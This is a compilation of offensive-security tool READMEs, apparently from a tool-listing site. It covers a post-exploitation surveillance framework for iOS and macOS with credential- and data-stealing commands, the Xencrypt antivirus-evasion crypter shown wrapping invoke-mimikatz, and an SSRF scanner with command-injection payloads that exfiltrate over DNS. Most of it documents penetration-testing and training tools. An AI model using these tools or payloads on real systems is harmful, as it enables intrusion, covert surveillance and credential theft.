
ABD - Course Materials For Advanced Binary Deobfuscation


Advanced Binary Deobfuscation
This repository contains the course materials of Advanced Binary Deobfuscation at the Global Cybersecurity Camp (GCC) Tokyo in 2020.

Course Abstract
Reverse engineering is not easy, especially if the binary code is obfuscated. Once obfuscation has been applied, the binary cannot be analyzed accurately with naive techniques alone. In this course, you will learn obfuscation principles (especially those used by malware), the theory and practice of obfuscated code analysis, and how to write your own tool for deobfuscation. In particular, we delve into data-flow analysis and SAT/SMT-based binary analysis (e.g., symbolic execution) to render obfuscation ineffective.

Outline
This course is about binary deobfuscation, meant for security analysts and researchers (in embryo) looking to add the skill of writing their own tools to their arsenal. At the end of this class, attendees will be able to:
  • Have an in-depth understanding of the theory, practice, and underlying insights of obfuscation
  • Build a custom obfuscated payload with state-of-the-art packers
  • Apply compiler optimization techniques to binary analysis tasks
  • Design and implement automated binary analysis tools on top of a symbolic execution engine
  • Even analyze obfuscated malware used in APT campaigns
To this end, the course was held as a combination of classroom learning and hands-on training at GCC.

Prerequisite Knowledge
Attendees should have:
  • Robust skill set in x86/x64 architecture
  • Basic experience with C/C++ and Python
  • Basic understanding of low-level CS (e.g., OSs, Compilers, interpreters, linkers, and loaders)
The following links are useful to bridge the gap.

Quick Start
We assume Ubuntu 18.04 with Miasm, Z3, and Jupyter Notebook.
  1. Install VirtualBox
  2. Download Ubuntu 18.04.3 Image and install it in VirtualBox
  3. Clone this repository
  4. Execute ./setup.sh ./
  5. Install IDA Freeware
  6. Read Advanced-Binary-Deobfuscation.pdf and enjoy!



Progress-Burp - Burp Suite Extension To Track Vulnerability Assessment Progress


Burp Suite extension to track vulnerability assessment progress.

Features
  • Capture items (unique requests) from the Burp Suite tools (Proxy, Repeater, Target). The unique key of a request is defined as follows: target (host, port, protocol), path and method.
  • Items have the following editable properties:
    • comment
    • status (Blocked, Done, Ignored, In progress, New, Postponed)
    • tags
  • Items can be filtered by:
    • status
    • tags (there are two filtering modes: AND - the item has to have all filtering tags; OR - the item has to have at least one of the filtering tags)
  • Exclude requests from capture based on the path extension or response status code
  • Selected items can be sent to the Burp Suite tools: Intruder, Repeater or Scanner
  • The selected item is displayed in the fully functional Burp Suite HTTP message editor
  • Path patterns - the unique key of a request is defined by target, path and method. However, it can be useful to define a path pattern (regexp) so that different requests are treated as the same item (e.g. the /article/\d+?/comments path pattern groups the following requests: /article/1/comments, /article/2/comments, /article/100/comments, etc.)
  • Optionally, items and path patterns can be persisted to keep the state between Burp Suite runs (please see Requirements)
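As an added illustration (not code from the Progress-Burp extension itself), the following Python builds the item key described above and shows how a path pattern collapses several requests into one item; the pattern list and the URLs are constructed for this example:

```python
import re
from urllib.parse import urlsplit

# Constructed for this example: path patterns as the extension would store them.
# Assumption: Java-style regexes; Python's re handles \d and +? the same way here.
PATH_PATTERNS = [r"/article/\d+?/comments", r"/users/[0-9a-f]{32}"]


def normalize_path(path, patterns=PATH_PATTERNS):
    """Return the first pattern matching the whole path, otherwise the path itself."""
    for pattern in patterns:
        if re.fullmatch(pattern, path):
            return pattern
    return path


def item_key(method, url, patterns=PATH_PATTERNS):
    """Unique item key: target (host, port, protocol), normalized path, method.

    The query string is deliberately ignored, as in the extension's key definition.
    """
    parts = urlsplit(url)
    protocol = parts.scheme.lower()
    port = parts.port or (443 if protocol == "https" else 80)
    path = parts.path or "/"
    return (parts.hostname, port, protocol, normalize_path(path, patterns), method.upper())


def collapse(requests, patterns=PATH_PATTERNS):
    """Group (method, url) pairs into items, mirroring the capture step."""
    items = {}
    for method, url in requests:
        items.setdefault(item_key(method, url, patterns), []).append(url)
    return items
```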

Options
  • Database - selects file to persist items and path patterns (please see Requirements)
  • Scope tools - enables item capture for the selected Burp Suite tools (Proxy, Repeater, Target)
  • Excluded extensions - requests with these path extensions won't be processed
  • Excluded status codes - responses (and related requests) with these status codes won't be processed
  • Overwrite duplicate items - the current item will be replaced by the newest duplicate (state of the item is preserved)
  • Process only in-scope requests
  • Set In progress status when sending item to tool

Requirements
To persist items and path patterns, the SQLite JDBC driver is required.
  1. Download the driver from https://mvnrepository.com/artifact/org.xerial/sqlite-jdbc
  2. Put the downloaded driver (jar file) in a folder on disk (e.g. /home/user/burpsuite-jars)
  3. Set the Burp Suite option (Extender -> Options -> Java Environment) to the path of the folder containing the driver
  4. Reload the extension

Changes
Please see the CHANGELOG



Multi-Juicer - Run Capture The Flags And Security Trainings With OWASP Juice Shop


Running CTFs and Security Trainings with OWASP Juice Shop is usually quite tricky: Juice Shop just isn't intended to be used by multiple users at a time. Instructing everybody how to start Juice Shop on their own machine works OK, but takes away too much valuable time.
MultiJuicer gives you the ability to run separate Juice Shop instances for every participant on a central kubernetes cluster, so you can run events without the need for local Juice Shop instances.
Note: This project was called JuicyCTF until recently. This was changed to avoid confusion with the juice-shop-ctf project.

What it does:
  • dynamically creates new Juice Shop instances when needed
  • runs on a single domain, and comes with a LoadBalancer sending the traffic to each participant's Juice Shop instance
  • backs up and automatically re-applies challenge progress in case of Juice Shop container restarts
  • cleans up old & unused instances automatically

Installation
MultiJuicer runs on kubernetes; to install it you'll need helm.
helm repo add multi-juicer https://iteratec.github.io/multi-juicer/

# for helm <= 2
helm install multi-juicer/multi-juicer --name multi-juicer

# for helm >= 3
helm install multi-juicer multi-juicer/multi-juicer

Installation Guides for specific Cloud Providers
Generally MultiJuicer runs on pretty much any kubernetes cluster, but to make it easier for anybody who is new to kubernetes we have some guides on how to set up a kubernetes cluster with MultiJuicer installed for some specific Cloud providers.

Customizing the Setup
You have some options for setting up the stack, including options to customize the JuiceShop instances to your own liking. You can find the default config values under: helm/multi-juicer/values.yaml
Download & Save the file and tell helm to use your config file over the default by running:
helm install -f values.yaml multi-juicer ./multi-juicer/helm/multi-juicer/

Deinstallation
helm delete multi-juicer

FAQ

How much compute resources will the cluster require?
To be on the safe side calculate with:
  • 1GB memory & 1CPU overhead, for the balancer, redis & co
  • 200MB & 0.2CPU * number of participants, for the individual JuiceShop Instances
The numbers above reflect the default resource limits. These can be tweaked, see: Customizing the Setup

How many users can MultiJuicer handle?
There is no real fixed limit (even though you can configure one). The custom LoadBalancer, through which all traffic for the individual instances flows, can be replicated as much as you'd like. You can also attach a Horizontal Pod Autoscaler to automatically scale the LoadBalancer.
When scaling up, also keep an eye on the redis instance. Make sure it is still able to handle the load.

Why a custom LoadBalancer?
There are some special requirements which we didn't find to be easily solved with any pre-built load balancer:
  • Restricting the number of users for a deployment to only the members of a certain team.
  • The load balancer's cookie must be secure and not easy to spoof in order to access another instance.
  • Handling starting of new instances.
If you have awesome ideas on how to overcome these issues without a custom load balancer, please write us, we'd love to hear from you!

Why a separate kubernetes deployment for every team?
There are some pretty good reasons for this:
  • The ability to delete the instances of a team separately. Scaling down safely, without removing instances of active teams, is really tricky with a scaled deployment: you can only choose the desired scale, not which pods to keep and which to throw away.
  • To ensure that pods are still properly associated with teams after a pod gets recreated. This is a non-problem with separate deployments and really hard with scaled deployments.
  • The ability to embed the team name in the deployment name. This seems like a stupid reason, but it makes debugging so much easier when just using kubectl.



Mouse Framework - An iOS And macOS Post Exploitation Surveillance Framework That Gives You A Command Line Session With Extra Functionality Between You And A Target Machine Using Only A Simple Mouse Payload


About Mouse Framework
Mouse Framework is an iOS and macOS post exploitation surveillance framework that gives you a command line session with extra functionality between you and a target machine using only a simple Mouse Payload. Mouse gives you the power and convenience of uploading and downloading files, tab completion, taking pictures, location tracking, shell command execution, escalating privileges, password retrieval, and much more.

Getting started

Mouse installation
cd mouse
chmod +x install.sh
./install.sh

Mouse uninstallation
cd mouse
chmod +x uninstall.sh
./uninstall.sh

Mouse Framework execution
To execute Mouse Framework you should execute the following command.
mouse

Mouse Payloads (macOS/iOS)


Mouse Payloads are intended to get a remote target machine session.

Bourne-Again Shell payload
Selecting the Bourne-Again Shell payload from the payload menu will give us a one-liner that establishes a remote Mouse session upon execution on the target machine.

Platform: iOS/macOS

Teensy macOS payload (USB injection)
Teensy is a development USB board that can be programmed with the Arduino IDE. It emulates USB keyboard strokes extremely fast and can inject the Mouse payload in just a few seconds!

Platform: macOS

Rubber Duck payload (USB injection)
USB Rubber Duck is a development USB board that can inject the inject.bin payload uploaded to the duck's SD card in a few seconds!

Platform: macOS

Application macOS payload
Selecting Application macOS from the payload menu will give you the standard Mouse payload converted to a macOS application.

Platform: macOS

MultiHandler CLI


The MultiHandler option lets us handle multiple sessions. You can choose to interact with different devices while listening for new connections in the background.

MultiHandler commands
close          : Close active session.
exit           : Close all sessions and exit.
help           : Show all available commands.
interact       : Interact with a session.
sessions       : List active sessions.

Mouse Substrate
Mouse Substrate is a package that can be installed on the target iOS device after receiving remote control to run substrate commands and services.

Substrate commands
dhome          : Simulate a double home button press.
home           : Simulate a home button press.
locat          : Toggle location services.
mute           : Update and view mute status.

Mouse CLI


After a session is established, we can execute commands on that device through the Mouse CLI. Typing "help" shows all available commands. The Mouse CLI commands, which control the remote device, are listed below.

Local commands


clear          : Clear terminal window.
help           : Show all available commands.
exec           : Execute local shell commands.
exit           : Close current session and exit.

Settings commands


macOS
getpaste       : Get pasteboard contents.
getvol         : Get speaker output volume.
idletime       : Get the amount of user activity time.
setbright      : Set screen brightness.
setvol         : Set output volume.

iOS
battery        : Get battery level.
getvol         : Get volume level.
msub           : Mouse Substrate.
setvol         : Set output volume.
sysinfo        : Show system information.

Trolling commands


macOS
alert          : Make alert show up on device.
chwall         : Change desktop wallpaper.
close          : Close application.
imessage       : Send message through the messages app.
itunes         : Control iTunes player.
keyboard       : Control keyboard.
open           : Open application.
say            : Convert text to speech.

iOS
alert          : Make alert show up on device.
dial           : Dial a phone number.
ipod           : Control music player.
kill           : Terminate or signal a process.
killall        : Kill process by name.
lastapp        : Open last opened application.
open           : Open application.
openurl        : Open URL on device.
say            : Convert text to speech.
vibrate        : Vibrate device.

Stealing commands


macOS
download       : Download remote file.
getfacebook    : Retrieve facebook session cookies.
mic            : Record mic sound.
picture        : Take picture through iSight.
prompt         : Prompt user to type password.
screenshot     : Take screenshot.

iOS
download       : Download remote file.
getcontacts    : Download addressbook.
getnotes       : Download notes.
getpasscode    : Retrieve the device passcode.
getsms         : Download SMS data.
locate         : Get device location coordinates.
mic            : Record mic sound.
picture        : Take picture through the camera.

Boot commands

macOS
reboot         : Reboot device.
sleep          : Put device into sleep mode.
suspend        : Suspend current session.

iOS
reboot         : Reboot device.
respring       : Restart SpringBoard.
safemode       : Put device into SafeMode.

Other commands


macOS
icons          : List system alert icons.
pid            : Get Mouse process ID.
shell          : Open target device shell.
su             : Login as root.
upload         : Upload local file.

iOS
bundleids      : List bundle identifiers.
islocked       : Check if the device is locked.
pid            : Get Mouse process ID.
shell          : Open target device shell.
upload         : Upload local file.

Mouse Framework disclaimer
Usage of the Mouse Framework for attacking targets without prior mutual consent is illegal. 
It is the end user's responsibility to obey all applicable local, state, federal, and international laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program.



Polyshell - A Bash/Batch/PowerShell Polyglot!

PolyShell is a script that's simultaneously valid in Bash, Windows Batch, and PowerShell (i.e. a polyglot).
This makes PolyShell a useful template for penetration testing, as it can be executed on most systems without the need for target-specific payloads. PolyShell is also specifically designed to be deliverable via input injection using a USB Rubber Ducky, MalDuino, or similar device.




How To Use It

As a stand-alone script
  1. Copy/rename the script so it has the correct file extension (.sh, .bat, or .ps1).
  2. Run the script with a Unix shell, as a batch file, or with PowerShell.

Using input injection
  1. Open a terminal on the target machine.
  2. Run the payload.
  3. Press Ctrl-C, then run exit.
The input injection method behaves slightly differently from the script method. When run as a script, the payload exits immediately once a language has been processed. When delivered via injection, the payload runs a read loop instead. Without it, the payload would close the terminal window but continue typing into an unknown window instead. The Ctrl-C breaks the script out of the read loop, allowing it to run without unintended side-effects.
Additionally, pasting the script into a terminal might fail. Once the script reaches the read loop, some terminals will treat the remaining pasted text as the read loop's input (good), but others may continue executing the script when the read loop exits (bad).

How It Works
The main trick is to get each other language to "look away" when we want to run code specific to only one of them. This is accomplished by exploiting language quirks surrounding quoting, redirection, and comments.
Consider the following line:
echo \" <<'BATCH_SCRIPT' >/dev/null ">NUL "\" \`" <#"
Each language sees the echo command, but will interpret the rest of the line differently.
For example, this is what each language will interpret as a string:
      echo \" <<'BATCH_SCRIPT' >/dev/null ">NUL "\" \`" <#"
Bash                                      [-----]     [---]
Batch       [-----------------------------]     [-]   [---]
PS          [-----------------------------]     [-]
After executing the line, the bash script will be in a here document, PowerShell script will be in a multiline-comment, and the batch script will continue executing normally. After each language is done executing, we terminate it. This prevents us from needing to work around its quirks later in the script.

Quirks
Obviously, the tricks required to make this polyglot don't follow normal coding conventions.
There are quite a few quirks that were leveraged or had to be worked around:
  • All three languages have different escape characters:
    • Bash: backslash (\)
    • Batch: caret (^)
    • PowerShell: backtick (`)
  • Escape characters work inside Bash and PowerShell strings, but not batch strings.
  • Redirects (i.e. < and >) have special meaning in all three languages unless quoted.
  • Redirects don't have to be at the end of a command.
    • This is valid Bash/Batch/PowerShell: echo >output.txt "Hello World"
  • Batch is the only language without multi-line strings or comments.
  • Batch treats > as a redirect even when it directly touches a string, but PowerShell doesn't.
  • Batch script GOTO statements only work when run as a script, not when run interactively.
  • PowerShell's multi-line comment (<#) must be immediately preceded by whitespace.
  • Bash's here documents may begin anywhere so long as it's unquoted and not a comment.



IoTGoat - A Deliberately Insecure Firmware Based On OpenWrt


The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10 as documented by OWASP: https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project.


To get started with developing IoTGoat challenges, review the Build Environment Guidance page. Precompiled firmware and an OVA with the latest build can be found via https://github.com/scriptingxss/IoTGoat/tree/master/build_environment. If a crucial challenge idea is missing, please reach out to the project leaders below or add details to the project task page. Be sure to join the OWASP Slack team, then join the #iot-security channel for news on upcoming project meetings and updates.

Project leaders
  • Aaron Guzman (@scriptingxss)
  • Fotios Chantzis
  • Paulino Calderon



Extended-SSRF-Search - Smart SSRF Scanner Using Different Methods Like Parameter Brute Forcing In Post And Get...


This tool searches for SSRF using predefined settings in different parts of a request (path, host, headers, post and get parameters).

First step
Rename example.app-settings.conf to app-settings.conf and adjust the settings. The most important setting is the callback url. I recommend using burp collaborator. Then you can add your urls to config/url-to-test.txt. Here the script accepts domains as well as urls with path and query parameters. If you like, you can add your own cookies to config/cookie-jar.txt and add additional headers for your requests. The brute force list which is used in post and get requests is currently small; I don't think adding 2000 parameters is smart. We should focus on those which have the highest probability of being vulnerable. If you don't think so: just add your own!

Execution
This tool does not expect any argument via CLI, so just type:
python3 extended-ssrf-search.py

Configuration
It's possible to set a lot of options and settings, so here are some explanations.

Files
The main config file is the "app-settings.conf", everything has to be done in that file! Besides that, there are some other files which allow to set more complex data like headers, urls and cookies.
config/cookie-jar.txt
Use this file to add a cookie string. I usually copy the one which you can see in every burp request. Please just copy the value of the "Cookie:"-header. A sample input is in the default file.
config/http-headers.txt
This file defines the http headers which are added to the request and manipulated (payload is added to each one). The most important ones are already in the file. But feel free to add more.
config/parameters.txt
The tool has the option to brute force get and post parameters. In that case those parameters (+ those in the query string) will be used. Each parameter gets the payload as value. Most important are already in that file.
config/static-request-headers.txt
Those headers are added to every request, but they won't get manipulated. They are static. That's the best place to add authorization or bearer cookies. One (Key: Value) per line!
config/urls-to-test.txt
That's the file you need! Please add here your links to scan. The following formats are allowed:
When the last case is detected an "http://" is prepended. This tool is intended to work with a good list of urls. A good way to get one is to just export it using burp. Then you have a valid list of urls. All you need to do is to just add your cookies.

Settings
The app-settings.conf defines the program workflow. It's the most important file; you can activate/deactivate different modules there.

Basic settings
CallbackHost
The url/host to which all dns and http requests are sent back - I mostly use burp collaborator here, but DNSBin or your own server is also perfect.
HTTPMethod
Defines the request method. Valid options are: GET, POST, PUT, DELETE, PATCH, OPTIONS. Invalid values will produce massive errors since http.client disallows other methods! I don't check if you did something wrong here ;)
HTTPTimeout
Some requests can take long. Here you can define the max. execution time of one request. I recommend values between 2 and 6 seconds.
MaxThreads
The more threads, the faster the script is - but since we are dealing with a lot of connections I usually keep this below 10 on my personal computer and around 30 on my VPS.
ShuffleTests
Especially when dealing with a BIG list of urls, having this set to "true" will shuffle all created tests. That way the same host will not get hit that much. If you scan just one host, then it doesn't matter.
GetChunkSize
When working with bigger param lists this might be handy and prevent 400 too large entity errors.

Insertion points
Each insertion point can be activated (set to true/1) or deactivated (set to false/0)
InPath
The example shows a GET request, but depending on your settings, this could also be POST, PUT, DELETE, ...
GET [INJECT HERE PAYLOAD] HTTP/1.1
...
InHost
The example shows a GET request, but depending on your settings, this could also be POST, PUT, DELETE, ...
GET /path HTTP/1.1
Host: [INJECT HERE PAYLOAD]
...
InAdditionalHeaders
The example shows a GET request, but depending on your settings, this could also be POST, PUT, DELETE, ...
GET /path HTTP/1.1
...
X-Forwarded-For: [INJECT HERE PAYLOAD]
InParamsGet
Here the Method is fixed to GET.
GET /path?[INJECT HERE PAYLOAD] HTTP/1.1
...
InParamsPost
Here the Method is fixed to POST.
POST /path HTTP/1.1
...
Content-Type: application/x-www-form-urlencoded
Content-Length: XXX

[INJECT HERE PAYLOAD]
InParamsPostAsJson
Here the Method is fixed to POST.
POST /path HTTP/1.1
...
Content-Type: application/json
Content-Length: XXX

[INJECT HERE JSON-PAYLOAD]

Attacks
In the default settings this tool just tries to trigger http requests via SSRF. But it's also possible to exfiltrate data using DNS, when an OS command is injected. The most common payload is "$(hostname)". There are some options which allow this kind of attack to be used additionally.
UseExecPayload
Using this setting you can activate/deactivate that behaviour.
ExecPayload
Here you can define your own payload, e.g. $(uname -a)

Identifier
To make the identification a little bit easier a combination of current host and method (in short form, see Tests.py) is appended or prepended to the payload.
Position
Valid options are "append" and "prepend"!
If "append" is chosen, the payloads look like this:
....burpcollaborator.net/www.attacked-domain.com-testmethod
http://....burpcollaborator.net/www.attacked-domain.com-testmethod
If "prepend" is chosen, the payloads look like this:
www.attacked-domain.com-testmethod.burpcollaborator.net
http://www.attacked-domain.com-testmethod.burpcollaborator.net/
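An added, defender-side example (not part of extended-ssrf-search) that covers the insertion points listed above and the identifier format from this section: it parses a raw HTTP request and reports which insertion points carry a hostname under a watched callback domain. The callback-domain list and the requests are constructed for this example; the insertion point names mirror the app-settings.conf keys.

```python
import re

# Assumption for this example: the defender's own list of callback domains to watch for.
CALLBACK_DOMAINS = ("burpcollaborator.net", "callback.example")

# Hostname with an optional scheme in front. The tool's identifier form
# "<attacked-host>-<method>.<callback-host>" is just a longer hostname, so it matches too.
HOST_RE = re.compile(r"(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})", re.I)


def find_callback_hosts(text):
    """Return every hostname in text that ends with a watched callback domain."""
    return [h.lower() for h in HOST_RE.findall(text) if h.lower().endswith(CALLBACK_DOMAINS)]


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method.upper(), target, headers, body


def ssrf_insertion_points(raw):
    """Map each insertion point (named as in app-settings.conf) to the callback hosts found there."""
    method, target, headers, body = parse_request(raw)
    path, _, query = target.partition("?")
    hits = {}
    if found := find_callback_hosts(path):            # InPath: the whole request target
        hits["InPath"] = found
    if found := find_callback_hosts(headers.get("host", "")):
        hits["InHost"] = found
    for name, value in headers.items():               # InAdditionalHeaders: anything but Host
        if name != "host" and (found := find_callback_hosts(value)):
            hits.setdefault("InAdditionalHeaders", []).extend(found)
    if found := find_callback_hosts(query):           # InParamsGet: the query string
        hits["InParamsGet"] = found
    if method == "POST" and (found := find_callback_hosts(body)):
        as_json = "json" in headers.get("content-type", "").lower()
        hits["InParamsPostAsJson" if as_json else "InParamsPost"] = found
    return hits
```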

Tunneling
It's also possible to use a tunnel, e.g. "127.0.0.1:8080" (Burp Proxy), to monitor all traffic within Burp.
Active
Setting this to "true" will force the script to use a tunneled connection.
Tunnel
Set here your proxy server "ip:port".
The result is the following; when you open Burp you can watch your http history:




Subfinder - A Subdomain Discovery Tool That Discovers Valid Subdomains For Websites


subfinder is a subdomain discovery tool that discovers valid subdomains for websites by using passive online sources. It has a simple modular architecture and is optimized for speed. subfinder is built for doing one thing only - passive subdomain enumeration, and it does that very well.
We have designed subfinder to comply with all passive sources licenses, and usage restrictions, as well as maintained a consistently passive model to make it useful to both penetration testers and bug bounty hunters alike.

Features
  • Simple and modular code base making it easy to contribute.
  • Fast And Powerful Resolution and wildcard elimination module
  • Curated passive sources to maximize results (26 Sources as of now)
  • Multiple Output formats supported (Json, File, Stdout)
  • Optimized for speed, very fast and lightweight on resources
  • Stdin and stdout support for integrating in workflows

Usage

subfinder -h
This will display help for the tool. Here are all the switches it supports.
Flag               Description                                                  Example
-config string     Configuration file for API Keys, etc                         subfinder -config config.yaml
-d                 Domain to find subdomains for                                subfinder -d uber.com
-dL                File containing list of domains to enumerate                 subfinder -d hackerone-hosts.txt
-exclude-sources   List of sources to exclude from enumeration                  subfinder -exclude-sources archiveis
-max-time          Minutes to wait for enumeration results (default 10)         subfinder -max-time 1
-nC                Don't Use colors in output                                   subfinder -nC
-nW                Remove Wildcard & Dead Subdomains from output                subfinder -nW
-o                 File to write output to (optional)                           subfinder -o output.txt
-oD                Directory to write enumeration results to (optional)         subfinder -oD ~/outputs
-oI                Write output in Host,IP format                               subfinder -oI
-oJ                Write output in JSON lines Format                            subfinder -oJ
-r                 Comma-separated list of resolvers to use                     subfinder -r 1.1.1.1,1.0.0.1
-rL                Text file containing list of resolvers to use                subfinder -rL resolvers.txt
-silent            Show only subdomains in output                               subfinder -silent
-sources           Comma separated list of sources to use                       subfinder -sources shodan,censys
-t                 Number of concurrent goroutines for resolving (default 10)   subfinder -t 100
-timeout           Seconds to wait before timing out (default 30)               subfinder -timeout 30
-v                 Show Verbose output                                          subfinder -v
-version           Show current program version                                 subfinder -version

Installation Instructions

Direct Installation

subfinder requires go1.13+ to install successfully!
The installation is easy. You can download the pre-built binaries for different platforms from the Releases page. Extract them using tar, move it to your $PATH and you're ready to go.
> tar -xzvf subfinder-linux-amd64.tar
> mv subfinder-linux-amd64 /usr/bin/subfinder
> subfinder
If you want to build it yourself, you can go get the repo
go get -v github.com/projectdiscovery/subfinder/cmd/subfinder

Upgrading
If you wish to upgrade the package you can use:
go get -u -v github.com/projectdiscovery/subfinder/cmd/subfinder

Running in a Docker Container
You can use the official dockerhub image at subfinder. Simply run -
> docker pull ice3man/subfinder
The above command will pull the latest tagged release from the dockerhub repository.
If you want to build the container yourself manually, git clone the repo, then build and run the following commands
  • Clone the repo using git clone https://github.com/projectdiscovery/subfinder.git
  • Build your docker container
docker build -t ice3man/subfinder .
  • After building the container using either way, run the following -
docker run -it ice3man/subfinder
The above command is the same as running -h
For example, this runs the tool against uber.com and outputs the results to your host file system:
docker run -v $HOME/.config/subfinder:/root/.config/subfinder -it ice3man/subfinder -d uber.com > uber.com.txt

Post Installation Instructions
Subfinder will work after following the installation instructions; however, to configure Subfinder to work with certain services, you will need to have set up API keys. The following services do not work without an API key:
These values are stored in the $HOME/.config/subfinder/config.yaml file, which will be created when you run the tool for the first time. The configuration file uses the YAML format. Multiple API keys can be specified for each of these services, from which one will be used for enumeration.
For sources that require multiple keys, namely Censys, Passivetotal, they can be added by separating them via a colon (:).
An example config file -
resolvers:
- 1.1.1.1
- 1.0.0.1
sources:
- binaryedge
- bufferover
- censys
- passivetotal
- sitedossier
binaryedge:
- 0bf8919b-aab9-42e4-9574-d3b639324597
- ac244e2f-b635-4581-878a-33f4e79a2c13
censys:
- ac244e2f-b635-4581-878a-33f4e79a2c13:dd510d6e-1b6e-4655-83f6-f347b363def9
certspotter: []
passivetotal:
- sampleemail@user.com:sample_password
securitytrails: []
shodan: []
If you are using docker, you need to first create your directory structure holding subfinder configuration file. After modifying the default config.yaml file, you can run:
> mkdir $HOME/.config/subfinder
> cp config.yaml $HOME/.config/subfinder/config.yaml
> nano $HOME/.config/subfinder/config.yaml
After that, you can pass it as a volume using the following sample command.
> docker run -v $HOME/.config/subfinder:/root/.config/subfinder -it ice3man/subfinder -d freelancer.com

Running Subfinder
To run the tool on a target, just use the following command.
> subfinder -d freelancer.com
This will run the tool against freelancer.com. There are a number of configuration options that you can pass along with this command. The verbose switch (-v) can be used to display verbose information.
[CERTSPOTTER] www.fi.freelancer.com
[DNSDUMPSTER] hosting.freelancer.com
[DNSDUMPSTER] support.freelancer.com
[DNSDUMPSTER] accounts.freelancer.com
[DNSDUMPSTER] phabricator.freelancer.com
[DNSDUMPSTER] cdn1.freelancer.com
[DNSDUMPSTER] t1.freelancer.com
[DNSDUMPSTER] wdc.t1.freelancer.com
[DNSDUMPSTER] dal.t1.freelancer.com
The -o command can be used to specify an output file.
> subfinder -d freelancer.com -o output.txt
To run the tool on a list of domains, -dL option can be used. This requires a directory to write the output files. Subdomains for each domain from the list are written in a text file in the directory specified by the -oD flag with their name being the domain name.
> cat domains.txt
hackerone.com
google.com

> subfinder -dL domains.txt -oD ~/path/to/output
> ls ~/path/to/output

hackerone.com.txt
google.com.txt
If you want to save results to a single file while using a domain list, specify the -o flag with the name of the output file.
> cat domains.txt
hackerone.com
google.com

> subfinder -dL domains.txt -o ~/path/to/output.txt
> ls ~/path/to/

output.txt
You can also get output in json format using -oJ switch. This switch saves the output in the JSON lines format.
If you use the JSON format, or the Host:IP format, then it becomes mandatory for you to use the -nW flag, as resolving is essential for these output formats. By default, resolving the found subdomains is disabled.
> subfinder -d hackerone.com -o output.json -oJ -nW
> cat output.json

{"host":"www.hackerone.com","ip":"104.16.99.52"}
{"host":"mta-sts.hackerone.com","ip":"185.199.108.153"}
{"host":"hackerone.com","ip":"104.16.100.52"}
{"host":"mta-sts.managed.hackerone.com","ip":"185.199.110.153"}
The --silent switch can be used to show only subdomains found without any other info.
You can specify custom resolvers too.
> subfinder -d freelancer.com -o result.txt -nW -v -r 8.8.8.8,1.1.1.1
> subfinder -d freelancer.com -o result.txt -nW -v -rL resolvers.txt
The new highlight of this release is the addition of stdin/stdout features. Now, domains can be piped to subfinder and enumeration can be run on them. For example:
> echo "hackerone.com" | subfinder -v 
> cat targets.txt | subfinder -v
The subdomains discovered can be piped to other tools too. For example, you can pipe the subdomains discovered by subfinder to the awesome httprobe tool by @tomnomnom which will then find running http servers on the host.
> echo "hackerone.com" | subfinder -silent | httprobe 

http://hackerone.com
http://www.hackerone.com
http://docs.hackerone.com
http://api.hackerone.com
https://docs.hackerone.com
http://mta-sts.managed.hackerone.com



Xencrypt - A PowerShell Script Anti-Virus Evasion Tool

Tired of wasting lots of time obfuscating PowerShell scripts like invoke-mimikatz only to have them get detected anyway? Wouldn't it be awesome if you could take any script and automatically and with almost no effort generate a near-infinite amount of variants in order to defeat signature-based antivirus detection mechanisms?
WELL, NOW YOU CAN! For the low low price of free! Xencrypt is a PowerShell crypter that uses AES encryption and Gzip/DEFLATE compression to generate, with every invocation, a completely unique yet functionally equivalent output script given any input script. It does this by compressing and encrypting the input script and storing the result as a payload in a new script, which decrypts and decompresses the payload before running it. In essence, it is to PowerShell what a PE crypter is.

In action



Features
Xencrypt:
  • Bypasses AMSI and all modern AVs in use on VirusTotal (as of writing)
  • Compresses and encrypts powershell scripts
  • Has a minimal and often even negative (thanks to the compression) overhead
  • Randomizes variable names to further obfuscate the decrypter stub
  • Randomizes encryption, compression and even the order that the statements appear in the code for maximum entropy!
  • Super easy to modify to create your own crypter variant
  • Supports recursive layering (crypter crypting the crypted output), tested up to 500 layers.
  • Supports Import-Module as well as standard running as long as the input script also supported it
  • GPLv3 -- Free and open-source!
  • All features in a single file so you can take it with you anywhere!
  • Is despite all of the above not a silver bullet for every configuration -- caveat emptor!

Usage
Import-Module ./xencrypt.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1
You will now have an encrypted xenmimi.ps1 file in your current working directory. You can use it in the same way as you would the original script, so in this case:
Import-Module ./xenmimi.ps1
Invoke-Mimikatz
It also supports recursive layering via the -Iterations flag.
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1 -Iterations 100
This will compress and encrypt it 100 times and is useful for dynamic AV bypasses because they have a time-out for analyzing code. There's no fakery here like sleeps that the dynamic scan can skip to get to the end -- it has to go through the entire chain to get to the malicious payload, which it usually never does since they normally time out after a second or two of scanning.
Warning though, the files can get big and generating the output file can take a very long time depending on the scripts and number of iterations requested.

Authors
Xentropy ( @SamuelAnttila )
SecForce ( @SECFORCE_LTD )

Contributing
If you want to contribute, feel free to contact on Twitter ( @SamuelAnttila ) or submit pull requests. Any and all ideas for improvements are welcome and you'll be credited appropriately, just please try to keep it to one file in order to make the tool easy to take with you in your kit.



BadBlood - Fills A Microsoft Active Directory Domain With A Structure And Thousands Of Objects


BadBlood by Secframe fills a Microsoft Active Directory domain with a structure and thousands of objects. The output of the tool is a domain similar to a domain in the real world. After BadBlood is run on a domain, security analysts and engineers can practice using tools to gain an understanding of, and prescribe approaches to, securing Active Directory. Each time this tool runs, it produces different results. The domain, users, groups, computers and permissions are different. Every. Single. Time.

Commands
  • NONE: At this time all items of the script are configured in the .ps1 files. The files are outlined in the User Guide on Secframe.com

Acknowledgments
I'd like to send thanks to the countless people who wanted this as a product and waited while I made it!

Screenshots







Installation
Requirements:
  • Domain Admin and Schema Admin permissions
  • Active Directory Powershell Installed
Running On Windows:
# clone the repo
git clone https://github.com/davidprowe/badblood.git
#Run Invoke-badblood.ps1
./badblood/invoke-badblood.ps1

Talk About the BadBlood
